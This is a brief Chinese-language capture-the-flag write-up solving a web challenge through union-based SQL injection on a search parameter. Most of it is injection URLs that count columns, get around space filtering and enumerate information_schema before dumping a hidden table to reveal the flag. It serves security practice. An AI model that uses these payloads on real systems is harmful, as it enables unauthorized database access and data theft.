点击网页左边,bp抓包,可以看到查询语句。/query?search=arabia_terra/**/ORDER/**/BY/**/2
初步判断列数是2。在bp里修改URL的话最好对空格进行编码%20,或者用/**/代替
再用一下语句查出数据库是aliens
/query?search=arabia_terra%20union%20select%201,database()
/query?search=arabia_terra%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()
爆一下这个数据库的表:amazonis_planitia,arabia_terra,chryse_planitia,hellas_basin,hesperia_planum,noachis_terra,olympus_mons,tharsis_rise,utopia_basin
就是目录上的那些,好像没啥用
/query?search=arabia_terra%20union%20select%201,group_concat(schema_name)%20from%20information_schema.schemata
爆出来三个数据库:information_schema,alien_code,aliens,那最有可能的就是alien_code
/query?search=arabia_terra%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema="alien_code"
表只有一张:code
/query?search=arabia_terra%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name="code"
两个字段:id,code
/query?search=arabia_terra%20union%20select%201,group_concat(id,code)%20from%20alien_code.code
得到flag